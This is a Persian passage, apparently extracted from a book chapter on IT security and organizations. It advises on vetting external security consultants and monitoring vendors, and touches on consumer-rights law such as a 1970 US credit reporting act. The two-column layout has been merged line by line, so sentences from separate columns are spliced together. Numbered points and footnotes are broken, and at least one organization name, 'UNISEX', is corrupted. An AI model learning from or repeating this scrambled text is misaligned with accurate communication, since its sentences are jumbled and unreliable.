ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺣﺎﺿﺮﻳﺪ ﻳﻚ ﺗﺒﻬﻜـﺎﺭ ﺍﺻـﻼﺡ ﺷـﺪﻩ ﺭﺍ ﺑـﺮﺍﻱ ﺷﺎﻳﺴﺘﮕﻲ ﺑﺮﺍﻱ ﻣﺸﺎﻭﺭﻩ ﻧﻤﻲﺑﺎﺷﺪ.
ﺍﺩﺍﺭﺓ ﻣﺮﻛﺰ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﻭﻳﮋﺓ ﺷﺮﻛﺖ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ؟ ﺍﻳـﻦ
ﻣﻮﺍﺭﺩ ﺗﻨﻬـﺎ ﭘـﻴﺶﺑﻴﻨﻴﻬـﺎﻱ ﺑـﺪ ﻧﻴـﺴﺘﻨﺪ؛ ﺑﻠﻜـﻪ ﻫﺮﻳـﻚ
ﺑﻴﻤﻪ ﻭ ﺗﻌﻬﺪﻧﺎﻣﻪ
ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭ ﻛﻨﻨﺪ ﺑﭙﺮﺳـﻴﺪ ﻛـﻪ ﺁﻳـﺎ
ﺩﺭﺻــﻮﺭﺕ ﺑــﺮﻭﺯ ﺍﺷــﻜﺎﻝ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘــﺎﻱ ﺷــﻤﺎ ﺭﺍ ﺑــﻪ
ﺑﻴﻤﻪ ﻫﺴﺘﻨﺪ ﻭ ﺗﻌﻬﺪ ﺳﭙﺮﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻨﻜﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛـﻪ
ﺩﺍﺩﮔﺎﻫﻬﺎ ﻭ ﻣﺤﺎﻛﻢ ﻣﺪﻧﻲ ﺑﺎﺯ ﻛﻨﻨﺪ -ﺑﻪ ﻫـﺮ ﺣـﺎﻝ ﺍﻳـﻦ
ﺷﺮﻛﺖ ﺁﻧﻬﺎ ﺑﻪ ﺷﺎﻳﺴﺘﮕﻲ ﻭ ﺭﻓﺘﺎﺭ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ .ﺍﻳﻨﻜـﺎﺭ
ﺷﻤﺎ ﺑﻮﺩﻩﺍﻳﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﺳﺎﺑﻘﺔ ﺁﻧـﺎﻥ ﺗـﺼﻤﻴﻢ
ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨـﺪ ﻛـﻪ ﺁﻥ ﺳـﺎﺯﻣﺎﻥ ﻭﺍﺟـﺪ ﺷﺎﻳـﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ
ﺑﻪ ﺍﺳﺘﺨﺪﺍﻣﺸﺎﻥ ﮔﺮﻓﺘﻪﺍﻳﺪ.
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺑﻪ ﻧﻮﻋﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺁﻥ ﺳـﻮﺀ
ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﻧﺠـﺎﻡ .۲ ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﻧﺪﺍﺭﻧﺪ.
ﻣﺼﺎﺣﺒﻪ ﺑﺎ ﺷﻤﺎ ﺍﺯ ﺍﺭﺍﺋﻪ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ
ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ .ﺷﺎﻳﺪ ﺁﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺩﺭ ﻭﺭﻭﺩ ﺑﻪ ﺑﺪﻧـﺔ ﺭﺍﺑﻄﻪﻫﺎ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺗﻤـﺎﺱ ﺗﻠﻔﻨـﻲ ﺧﺒـﺮﻩ ﺍﺯ ﺍﻓــﺮﺍﺩ ﺑﭙﺮﺳــﻴﺪ ﻛــﻪ ﺩﺭ ﻛــﺪﺍﻡ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺤﻠــﻲ ،ﻣﻠــﻲ ﻭ
ﺑﺎﺷﻨﺪ! ﺍﻣﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺘﺪﺍﺋﻲﺗـﺮﻳﻦ ﺩﻻﻳﻠـﻲ ﻛـﻪ ﻣـﻲﺗـﻮﺍﻥ ﺑـــﻴﻦﺍﻟﻤﻠﻠـــﻲ ) ،IEEE ،CSI ،ASIS ،ACMﻭ (UNISEXﻋـــﻀﻮ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﺳﺎﻣﻲ ﻣﺴﺘﻌﺎﺭ ﺑﺮﺷﻤﺮﺩ ﺍﻳﻦ ﺍﺳـﺖ ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻄﻠﻮﺑﻲ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﻛﻪ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻗﺒﺎﻝ ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺑﺮ ﻋﻬﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﻣﻄﺎﻟـﺐ ﺁﻣﻮﺯﺷـﻲ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﭘﻴـﺸﺮﻓﺖ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﻳـﻚ ﻧـﺎﻡ ﻣـﺴﺘﻌﺎﺭ ﺑـﺪﻧﺎﻡ ﺷـﺪ ﺑـﺴﻴﺎﺭ ﺗﺨﺼﺼﻲ ﻣﻬﻴﺎ ﻣﻲﺳﺎﺯﻧﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺭﻓﺘـﺎﺭ
ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺨﻮﺍﻫـﺪ ﺣﺮﻓﻪﺍﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ .ﺍﮔﺮ ﺳﻮﮊﺓ ﺷﻤﺎ ﺗﻨﻬﺎ ﻣـﺪﻋﻲ
ﻧﺎﻡ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻭ ﻳـﺎ ﺳـﺎﺑﻘﺔ ﺁﻧـﺮﺍ ﺍﺻـﻼﺡ ﺳﺎﺑﻘﺔ ﻋـﻀﻮﻳﺖ ﺩﺭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻣﺜـﻞ " The 133t Hax0r
ﻛﻨﺪ. "Guildﺍﺳﺖ ﺷﺎﻳﺪ ﺑﻬﺘـﺮ ﺑﺎﺷـﺪ ﺟـﺎﻱ ﺩﻳﮕـﺮﻱ ﺑـﺪﻧﺒﺎﻝ ﻳـﻚ
ﻛﺎﺭﺷﻨﺎﺱ ﺍﻣﻨﻴﺖ ﺑﮕﺮﺩﻳﺪ!
ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ. ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣـﺮﻭﺯﻱ ﭼﻨـﺪﺍﻥ .۳
ﻫﻢ ﺑﻪ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﻭﺍﺭﺩ ﻧﻴﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻫـﻢ ﺩﺭ ﺭﻭﺵ ﻭ
ﺩﺭ ﻣﻮﺭﺩ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺁﻥ .۲
ﺟﺰﺀ ﺑﺮ ﻋﻬﺪﺓ ﺍﻭ ﺍﺳﺖ ﮔﺰﺍﺭﺵ ﻛﺘﺒﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ .ﺍﮔـﺮ ﻫﻢ ﺩﺭ ﺷﻴﻮﺓ ﻛﺎﺭ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺟﻨـﺎﻳﻲ ﻋﻤـﻞ
ﺳﺨﺖﺍﻓﺰﺍﺭ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧـﺼﺐ ﺷـﺪﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺮﻧﺎﻣـﻪ ﻧﻮﻳـﺴﺎﻥ ﻭ ﻣﻌﻤـﺎﺭﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ .ﺍﻳـﻦ
ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﻔﺮﺳـﺘﺪ ﻳـﺎ ﻛﻴﻔﻴﺖ ﭘﺎﺋﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺍﻣـﺮﻭﺯﻱ ،ﻓﻘـﺪﺍﻥ ﺭﻭﻧـﺪ
ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎ ،ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﮔـﺴﺘﺮﺩﺓ
ﺩﺭ ﭘﺮﻛــﺎﺭﺑﺮﺩﺗﺮﻳﻦ ﺳــﺎﻋﺎﺕ ﺭﻭﺯ ﺑــﺼﻮﺭﺕ ﻏﻴﺮﻣﻨﺘﻈــﺮﻩ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﺷﺪﻩ ﺩﺳﺖﻳـﺎﺯﻱ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ ،ﻧﺒﺎﻳﺪ ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟـﻪ
ﻭ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺎﺩﮔﻲ ﻣﻴـﺴﺮ ﺑﺎﺷـﺪ.
ﺷﻮﻳﺪ ﻃﺒﻖ ﺗﻮﺍﻓﻘﻲ ﻛـﻪ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺍﺷـﺘﻪﺍﻳـﺪ ﻫـﻴﭻ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎ ﺳﺎﺑﻘﺔ ﭘﺮﺵ ﺑﺎ ﺍﺗﻮﻣﺒﻴﻞ ﻟﺰﻭﻣﹰﺎ ﻳﻚ
ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟﻪ ﺍﻭ ﻧﻴﺴﺖ!
ﺭﺍﻧﻨﺪﺓ ﻣﺎﻫﺮ ﻣﺎﺷﻴﻦ ﻣﺴﺎﺑﻘﻪ ﻳﺎ ﻳﻚ ﻃـﺮﺍﺡ ﺧﺒـﺮﺓ ﻣﻮﺗـﻮﺭ
ﺧﺎﻃﺮﺟﻤﻊ ﺷﻮﻳﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﻪ ،ﺁﺯﻣـﺎﻳﺶ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ ﺁﻥ .۳ ﺍﺗﻮﻣﺒﻴﻞ ﻧﻴﺴﺖ ،ﻛﺴﻲ ﻛﻪ ﻣﻲ ﺩﺍﻧﺪ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷﻮﺩ ﻣﺮﺍﻗﺒﺖ ﻧﻔﻮﺫ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﺍ
ﺩﻗﻴﻖ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؛ ﺑﻮﻳﮋﻩ ﺍﮔﺮ ﻃﺮﺍﺣﻲ ﻣﻨﺤـﺼﺮ ﺑـﻪ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻓﻬﻢ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ
ﻓﺮﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻄﻮﺭ ﺧـﺎﺹ ،ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺳـﻮﺍﺑﻖ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ
ﻛﻴﻔــﻲ ﻭ ﻣــﺴﺎﺋﻞ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺷــﺮﻛﺖ ﺑﻨﻴﺎﺩﻳﻦ ﺑﺎﺷﺪ.
ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ،ﭘﻴــﺸﻨﻬﺎﺩ ﻣــﻲﻛﻨــﻴﻢ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﺧﺪﻣﺎﺕ ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﻓﻨـﺎﻭﺭﻱ ﺍﻣﻨﻴـﺖ ﺧﺪﻣﺎﺕ ﻧﻈﺎﺭﺕ
ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﻣﺤﺼﻮﻻﺕ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗـﺮﺍﺭ ﺩﻫـﺪ
ﺍﮔﺮ ﻭﺿﻌﻴﺖ ﻋﻤﻮﻣﻲ ﭘﺎﻳﺪﺍﺭ ﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ
ﺩﻗــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤــﻞ ﺁﻭﺭﻳــﺪ؛ ﭼﺮﺍﻛــﻪ ﺁﻥ ﺷــﺮﻛﺖ ﺑﺎﻳــﺪ
ﻛﻨﺘﺮﻝ ﺳﺮﻣﺎﻳﻪ ﮔﺬﺍﺭﻱ ﺧﻮﺑﻲ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ .ﺧﺪﻣﺎﺕ ﺭﺍﻳﺠﻲ
ﻫﻤﻮﺍﺭﻩ ﻣﻌﺎﻳﺐ ﻳﺎﻓﺖﺷﺪﺓ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﺤﺼﻮﻻﺕ
ﻛﻪ ﺑﺼﻮﺭﺕ ﺭﻭﺯﻣﺮﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺍﻫﺒﺮﻱ ﻣﺤﻞ ﻛﺎﺭ
ﺞ ﺧــﻮﺩ ﺭﻓــﻊ ﻛﻨــﺪ ﻭ ﺩﺭ ﻋــﻴﻦ ﺣــﺎﻝ ﺳــﺎﺯﮔﺎﺭﻱ ﺁﻥﺭﺍﻳـ ﹺ
ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ،ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﻣﺤﻞ ﻛﺎﺭ ﻭ ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ ،ﻭﺍﻛـﻨﺶ
ﻣﺤﺼﻮﻻﺕ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺒﻠﻲ ﺭﺍ ﻧﻴﺰ ﺣﻔﻆ ﻧﻤﺎﻳﺪ.
ﺑﻪ ﺭﺧﺪﺍﺩ ﻭ ﭘﻴﮕﺮﺩ ﻗـﺎﻧﻮﻧﻲ )ﺩﺭﺻـﻮﺭﺕ ﺩﺭﺧﻮﺍﺳـﺖ( ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ
ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮ ﻭﺍﻗﻌﹰﺎ ﺑـﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ .۴ ﻳﻚ ﺳﺎﻳﺖ ﺟﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻭﻗـﺖ ﺧﺮﺍﺑـﻲ ﺳـﺎﻳﺖ
ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻳﺎ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻣﺸﻜﻞ ﭘﻲ ﺍﺻﻠﻲ .ﺍﻣﺎ ﻋﻼﻭﻩ ﺑﺮ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﺧﺼﻮﺹ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺧـﺪﻣﺎﺕ
ﺑﻪ ﻭﺟﻮﺩ ﺁﻥ ﻣﻲﺑﺮﺩ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ. ﻣــﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫﻨــﺪ ﺑﺎﻳــﺪ ﻣﺮﺍﻗــﺐ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺁﻧﻬﺎ ﻫﻢ ﺑﺎﺷﻴﺪ.
ﻛﻼﻡ ﺁﺧﺮ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻧﻈـﺎﺭﺗﻲ ﻭ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ،
ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺑﻴﺮﻭﻧــﻲ ﺭﺍﻩ ﺧــﻮﺑﻲ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﻱ ﺷـﺒﻜﺔ
ﺣﻔﺎﻇﺘﻬــﺎﻱ ﻻﺯﻡ ﻣــﻲﺑﺎﺷــﺪ .ﻣﻬﺎﺭﺗﻬــﺎﻳﻲ ﻛــﻪ ﺑــﺮﺍﻱ ﺗــﺪﻭﻳﻦ ﺷﻤﺎ ﻧﺼﺐ ﻛﻨﻨﺪ .ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ
ﺳﻴﺎﺳﺘﻬﺎ ،ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺟﻬــﺖ ﺑــﺎﺯﺑﻴﻨﻲ ﻭ ﺗﻐﻴﻴــﺮ ﺗﻨﻈﻴﻤــﺎﺕ ﺍﻣﻨﻴﺘــﻲ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ
ﺁﺗﺶ ،ﻭ ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻻﺯﻡ ﺍﺳﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺑﺎﻳﺪ ﺑﺎ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺧﻮﺭﺩ ﻣﺤﺘﺎﻃﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ؛
ﺑﻌﻀﹰﺎ ﺑﺴﻴﺎﺭ ﺗﺨﺼﺼﻲ ﻭ ﻧﺎﻣﺘﻌﺎﺭﻑ ﻫـﺴﺘﻨﺪ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻲ ﻣﺠﺎﺯ ﻭ ﺩﺭﻭﻥ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ
ﻣﻴﺎﻥ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻓﻌﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﺍﻧﺠـﺎﻡ ﺍﺳﺖ:
ﺻﺤﻴﺢ ﻫﻤﻴﻦ ﻛﺎﺭﻫﺎﺳﺖ ﻛﻪ ﺩﺭ ﺗﺪﺍﻭﻡ ﻳﻚ ﺗﺠـﺎﺭﺕ ﻳـﺎ ﺧﺎﺗﻤـﺔ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺍﺟـﺰﺍﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻜﻪ ﻭ .۱
ﺁﻥ ﺑﻪ ﻋﻠﺖ ﺑﺮﻭﺯ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻣﺨﺘﻠﻒ ،ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺍﺳﺖ.
ﺗﺠﻬﻴــﺰﺍﺕ ﺁﻥ ﺗﻮﺿــﻴﺤﺎﺕ ﻛﺎﻣــﻞ ﻭ ﻛﺘﺒــﻲ ﺩﺭﻳﺎﻓــﺖ
ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻮﺯﺓ ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺑﺎ ﺧﻄﺮ ﺭﻭﺑﺮﻭ ﺍﺳﺖ؛ ﭼﺮﺍﻛـﻪ ﻣﻲﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻣﺘﻮﺟـﻪ
ﭘﺪﻳﺪﻩﺍﻱ ﺟﺪﻳﺪ ﺍﺳﺖ ﻭ ﺑﺨﻮﺑﻲ ﺩﺭﻙ ﻧﻤﻲ ﺷﻮﺩ .ﺍﻓﺮﺍﺩ ﺷﺎﺭﻻﺗﺎﻥ، ﻣﻲﺷﻮﻳﺪ ﺁﻥ ﺍﺟﺰﺍ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻫﺮﻳـﻚ ﭼـﻪ
١٧٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺗﺒﻌﻴﺖ ﻛﻨﻨﺪ؟ ﺩﻭﻟﺘﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ .ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺧـﻮﺍﻫﻴﻢ ﺩﻳـﺪ ﺍﺯ
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺣﻘﻮﻕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺩﺭ ﻗـﺎﻧﻮﻥ ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻛﻮﺩﻛـﺎﻥ ﺍﺯ
ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻣﻄﺎﻟﺐ ﻏﻴﺮﺍﺧﻼﻗـﻲ .ﺩﺭ ﺑﺨـﺶ
ﮔﺰﺍﺭﺵ ﺍﻋﺘﺒﺎﺭ ﺑﺎﺯﺍﺭ) ١١٦ﻣﺼﻮﺏ ﺳﺎﻝ (۱۹۷۰ﺻﺮﺍﺣﺘﹰﺎ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ ١١٥
ﻗﺮﺍﺭ ﮔﺮﻓﺖ .ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺣﻘﻮﻕ ﺍﺳﺎﺳﻲ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﺭﺍ ﺑـﻪ ﭼﻬﺎﺭﻡ ﺑﺤﺚ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﻣﻄﺮﺡ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺗﺄﻛﻴﺪ ﻣﺎ ﺑﻴﺸﺘﺮ ﺭﻭﻱ ﻣﺴﺌﻮﻟﻴﺖ
ﺭﺳﻤﻴﺖ ﻣﻲﺷﻨﺎﺧﺖ؛ ﺣﻘﻮﻗﻲ ﭼﻮﻥ ﺣـﻖ ﻣﻼﺣﻈـﺔ ﮔﺰﺍﺭﺷـﻬﺎﻱ
ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻓﻀﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺳﺖ.
